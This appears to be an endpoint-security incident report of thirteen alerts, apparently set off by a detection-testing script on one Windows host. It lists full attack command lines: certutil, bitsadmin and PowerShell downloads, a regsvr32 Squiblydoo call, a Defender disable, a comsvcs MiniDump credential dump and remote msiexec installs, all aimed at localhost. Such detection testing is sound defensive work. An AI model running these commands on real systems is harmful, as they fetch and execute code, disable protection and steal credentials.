Incident Overview

Incident ID CINC-20251221-25471C12
Severity Critical (90)
Status new
Alert Count 13
Host Count 1

Timeline

First Seen 2025-12-22 06:45:32
Last Seen 2025-12-22 06:46:34
Duration 0d 0h 1m
Created 2025-12-22 08:36
Updated 2026-01-13 15:14

Kill Chain Analysis

Observed Tactics: Execution, Command and Control, Defense Evasion, Credential Access, Persistence
Techniques: User Execution, Ingress Tool Transfer, Regsvr32, PowerShell, Rundll32, OS Credential Dumping, BITS Jobs, Event Triggered Execution

Affected Hosts (1)

DESKTOP-FNUMV3U

Related Alerts (13)

Severity | Status | Hostname | Description | Tactic | Command Line | Time
High | new | DESKTOP-FNUMV3U | Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. | Command and Control | certutil -urlcache -split -f http://127.0.0.1/mal.exe C:\Users\User\AppData\Local\Temp\cert_test.exe | 12-22 06:46
Informational | new | DESKTOP-FNUMV3U | A process has written a known EICAR test file. Review the files written by the triggered process. | Execution | "python" mega_incident_generator.py --rounds 2 --interval 30 | 12-22 06:46
High | new | DESKTOP-FNUMV3U | A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a COM object. Review the script passed to scrobj.dll on the command line. | Defense Evasion | regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll | 12-22 06:46
High | new | DESKTOP-FNUMV3U | A PowerShell script attempted to bypass Microsoft's Antimalware Scan Interface (AMSI). PowerShell exploit kits often attempt to bypass AMSI to evade detection. Review the script. | Execution | C:\WINDOWS\system32\cmd.exe /c "powershell Set-MpPreference -DisableRealtimeMonitoring $true" | 12-22 06:46
High | new | DESKTOP-FNUMV3U | A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second-stage payloads. Review the command line. | Execution | C:\WINDOWS\system32\cmd.exe /c "powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/ps')"" | 12-22 06:46
High | new | DESKTOP-FNUMV3U | Rundll32 launched with unusual arguments. This occasionally results from applications misusing rundll32, but it might be malware preparing to hollow out the process or abusing it to launch a malicious payload. Review the command line and the process tree. | Defense Evasion | rundll32 comsvcs.dll MiniDump 123 C:\Users\User\AppData\Local\Temp\dump.dmp full | 12-22 06:46
High | new | DESKTOP-FNUMV3U | Rundll32 launched with unusual arguments. This occasionally results from applications misusing rundll32, but it might be malware preparing to hollow out the process or abusing it to launch a malicious payload. Review the command line and the process tree. | Defense Evasion | C:\WINDOWS\system32\cmd.exe /c "rundll32 comsvcs.dll MiniDump 123 C:\Users\User\AppData\Local\Temp\dump.dmp full" | 12-22 06:46
Critical | new | DESKTOP-FNUMV3U | A process appears to be accessing credentials and might be dumping passwords. If this is unexpected, review the process tree. | Credential Access | rundll32 comsvcs.dll MiniDump 123 C:\Users\User\AppData\Local\Temp\dump.dmp full | 12-22 06:46
High | new | DESKTOP-FNUMV3U | A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. | Defense Evasion | bitsadmin /transfer j http://127.0.0.1/test C:\Users\User\AppData\Local\Temp\bits.exe | 12-22 06:46
High | new | DESKTOP-FNUMV3U | Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. | Persistence | msiexec /q /i http://127.0.0.1/test.msi | 12-22 06:46
High | new | DESKTOP-FNUMV3U | Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. | Persistence | msiexec /q /i http://127.0.0.1/test.msi | 12-22 06:46
High | new | DESKTOP-FNUMV3U | Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. | Persistence | msiexec /q /i http://127.0.0.1/test.msi | 12-22 06:46
Informational | new | DESKTOP-FNUMV3U | A process has written a known EICAR test file. Review the files written by the triggered process. | Execution | "python" mega_incident_generator.py --rounds 2 --interval 30 | 12-22 06:45